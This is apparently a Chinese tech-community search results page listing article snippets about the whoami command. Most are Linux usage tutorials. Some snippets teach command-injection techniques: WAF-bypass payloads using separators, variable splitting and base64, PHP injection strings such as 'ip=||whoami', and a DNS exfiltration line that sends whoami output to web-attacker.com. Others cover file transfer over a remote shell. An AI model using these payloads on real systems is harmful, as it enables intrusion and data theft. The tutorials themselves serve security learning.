首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux下的 Whoami 命令

在这篇文章中,我们将会覆盖whoami命令。 就像名字显示的那样,whoami命令打印出当前用户的用户名。换句话说,它显示当前登录用户的名字。...如何使用 whoami 命令 whoami命令语法如下: whoami [OPTION] 为了显示当前系统登录用户的用户名,不带任何选项引入这个命令。...whoami 在使用su切换到另外一个用户时,whoami命令也可以很方便的用来验证用户名。 whoami 不接受任何的参数。.... whoami命令仅仅接受两个选项: -h, –help - 显示帮助信息并退出 -V, –version - 显示版本信息并退出 替代命令 运行id命令,加上-un选项,效果和whoami一样。...whoami [OPTION] 使用id命令可以获得更多关于用户的信息。 环境变量$USER包含了当前登录用户的用户名: echo $USER 总结 whoami命令代表“Who am I?” 。

4.5K20
您找到你想要的搜索结果了吗?
是的
没有找到

python0003_ 终端大冒险_终端命令_whoami_pwd_ls

终端大冒险_终端命令_ls_pwd_whoami 回忆 上次 了解基本环境简称含义CLI命令行界面GUI图形用户界面在 CLI 中 通过终端 连接 远程服务器的 壳(shell)控制 云端的核...胡乱敲击 使用面部在键盘上横滚添加图片注释,不超过 140 字(可选)shell环境报错了添加图片注释,不超过 140 字(可选)红颜色意味着不能执行终端命令whoami 终端上 依次按下 wh...whoami 文字变绿 说明 有whoami 这条命令添加图片注释,不超过 140 字(可选)这条命令发出绿光 Green Light I'm searching for youAlways 不会却步喔真爱...不会结束Green Light in my life执行命令 回车 执行whoami命令 显示出当前登录名whoami 就是 我是谁你 问 服务器我是谁 服务器 就告诉 你 你的用户名这叫有来有回添加图片注释...总结 这次 了解shell环境中的命令命令作用whoami显示当前用户名pwd显示当前文件夹ls列出当前文件夹下的内容python3仿佛进入大于号黑洞添加图片注释,不超过 140 字(可选)这python3

2300

Linux命令(12)—— 管理员权限相关操作、用户相关操作whoami、who、useradd、passwd、su、usermod、userdel

也可以在某个命令前面加上sudo,这样比较安全 whoami命令 如果要查看当前你操作的用户,可以使用该命令 who命令 查看所有登录的用户 1.添加用户useradd命令 在公司中,我们会有很多用户...,这个时候就需要了解添加用户的命令 我们可以先用ls /home命令查看我们有哪些用户组,用户组里面又会有各个用户,一对多的关系 useradd有一个选项为 -m ,一般都要加上,这样会创建一个和用户同名的主目录...此时我们有两个用户的主目录,我们再想添加一个python2用户,用上m参数会自动创建一个python2主目录,此时命令如下: ? 可见多了一个用户主目录 我们可以通过命令: ?...4.让新加的用户能够使用sudo命令,usermod命令 usermod有两个选项: (1)-G 此时的意思是为用户添加附加组 (2)-g 此时的意思是修改用户组 此时新加的python2用户还不能使用...sudo命令,如图所示: ?

2.1K10

如何使用Whoami在Kali上保持匿名性

关于Kali-Whoami Whoami工具的目的是让您在Kali-linux上尽可能地保持匿名活动,该工具提供了一个用户友好且易于使用的简单界面,并遵循两种不同的路径以确保最高级别的匿名性。...因此,我们需要先安装并配置好Whoami所需的依赖组件,我们可以直接运行下列命令完成准备工作: sudo apt update && sudo apt install tar tor curl python3...python3-scapy network-manager 工具安装 首先,我们需要使用下列命令将该项目源码克隆至本地: git clone https://github.com/omer-dogan.../kali-whoami 接下来,安装makefile sudo make install 完成上述操作之后,我们就可以开始使用Whoami了。...工具使用 完成工具的安装之后,我们需要在系统的搜索栏中搜索“Kali Whoami”,或直接在命令行终端中运行下列命令: sudo kali-whoami --help 此时,你将会看到如下所示的提示界面

1K30

绕过WAF运行命令执行漏洞的方法

这样就可以进行命令执行了 set cmd=whoami //赋值变量为whoami %cmd% //执行命令 也可以赋值多个变量,拼接利用 set cmd1=who set...| whoami //只执行whoami || 只有在前面命令失败才执行后面 ping 127.0.0.1 || whoami //不执行whoami ping xxx. || whoami /.../执行whoami &无论前面的命令是否能执行成功都会执行后面的命令 ping 127.0.0.1 & whoami //执行whoami ping xxx. & whoami //执行whoami...`(echo whoami)` $(echo whoami) 利用Shell特殊变量绕过 who$*ami who$@ami who$1ami 利用通配符匹配唯一命令名称执行命令(使用命令的绝对路径)...这里echo -n是不进行自动换行 2.6 利用base64绕过命令限制 echo whoami|base64 //先输出whoami的base64编码 `echo dwhvYW1pCg==|base64

1.1K30

详解php命令注入攻击

1.使远程服务器执行whoami命令。(whoami命令是查询当前用户身份的命令,比如管理员或普通用户) 打开实验环境,如下图所示,我们要使其执行whoami命令。 ?...后面的命令执行成功,得到我们的身份是system “&”在windows中的意思是:两条命令一起执行,先执行前面再执行后面,我们用ip=127.0.0.1&whoami来试一下 ?...可以看出whoami命令并没有成功被执行,原因是在ulr中,“&”是一个连接符号,会被转义成“%26”,那我们直接使用“%26”,它就会被转义成真正的“&”,所以我们不妨使用ip=127.0.0.1%26whoami...命令执行成功,可以看到服务器执行了两个命令(ping和whoami),我们的身份是system “||”在windows中的意思是:当前面一个执行失败,则执行后面的,我们用ip=127.0.0.1||whoami...这一次whoami命令并没有被执行,这是因为前面的命令可以执行,我们只要把前面的命令搞成不能执行的,让它自动执行下一条命令,根据前面提供的关键代码,我们知道只要传入了正常的ip地址,命令(ping)就会成功执行

2.2K30

详解php命令注入攻击

1.使远程服务器执行whoami命令。(whoami命令是查询当前用户身份的命令,比如管理员或普通用户) 打开实验环境,如下图所示,我们要使其执行whoami命令。...,先执行前面再执行后面,我们用ip=127.0.0.1&whoami来试一下 可以看出whoami命令并没有成功被执行,原因是在ulr中,“&”是一个连接符号,会被转义成“%26”,那我们直接使用“%26...”,它就会被转义成真正的“&”,所以我们不妨使用ip=127.0.0.1%26whoami再试一下 命令执行成功,可以看到服务器执行了两个命令(ping和whoami),我们的身份是system “||...”在windows中的意思是:当前面一个执行失败,则执行后面的,我们用ip=127.0.0.1||whoami来试一下 这一次whoami命令并没有被执行,这是因为前面的命令可以执行,我们只要把前面的命令搞成不能执行的...,让它自动执行下一条命令,根据前面提供的关键代码,我们知道只要传入了正常的ip地址,命令(ping)就会成功执行,所以我们试试把ip地址消除,用ip=||whoami来试一下 / / 命令执行成功,我们的身份是

1.2K00

Web Security 之 OS command injection

下面是一些在 Linux 和 Windows 平台上常用命令的摘要: 命令含义 Linux Windows 显示当前用户名 whoami whoami 显示操作系统信息 uname -a ver 显示网络配置...例如,应用程序使用 /var/www/static 路径作为静态资源目录,那么你可以提交以下输入: & whoami > /var/www/static/whoami.txt & > 符号就是输出重定向的意思...,上面这个命令就是把 whoami 的执行结果输出到 /var/www/static/whoami.txt 文件中,然后你就可以通过浏览器访问 https://vulnerable-website.com.../whoami.txt 查看命令的输出结果。...带外通道还提供了一种简单的方式将注入命令的输出传递出来,例如: & nslookup `whoami`.kgji2ohoyw.web-attacker.com & 这将导致对攻击者控制的域名的 DNS

1K20

FTP & VBScript & Powershell & Debug 远程传输

这里可以利用ftp的一些个功能帮助我们实现 我们将所有的命令都写入到一个文件中,之后用ftp -s:ftp.txt 的方式来进行加载 我们可以使用远程shell的 echo 命令将我们的命令写入到文件中...使用Debug传输文件 Debug 这个命令是一个很古老而且底层的命令 这个命令可以完成汇编和反汇编,并且可以修改Bios 经过之前的两种方法,相信大家肯定会说,我们能不能直接把二进制的文件一行一行地echo...进一个文件中,答案是否定的 不过这个思路是可以的,我们需要变通一下,将二进制文件转换成文本类型,之后进行传输,最后再用debug命令转化为二进制格式 debug 只能传输小于64K的文件,而我们的whoami.exe...whoami.txt ?...此时生成的1.DLL 就是我们的whoami.exe了,我们只需要重命名一下 copy1.dll nc.exe ?

1.7K10

Linux下用于查看系统当前登录用户信息的4种方法

使用w命令查看登录用户正在使用的进程信息 w命令用于显示已经登录系统的用户的名称,以及他们正在做的事。该命令所使用的信息来源于/var/run/utmp文件。...(PCPU时间)   用户当前正在使用的命令 w命令还可以使用以下选项   -h忽略头文件信息   -u显示结果的加载时间   -s不显示JCPU, PCPU, 登录时间 2.使用who命令查看(登录)...用户名称及所启动的进程 who命令用于列举出当前已登录系统的用户名称。...使用whoami命令查看你所使用的登录名称   whoami命令用于显示登入的用户名。   ...whoami命令的执行效果和id -un的效果完全一样 whoami命令能显示当前登入的用户名称,以及当前所使用的tty信息。

2.3K80
领券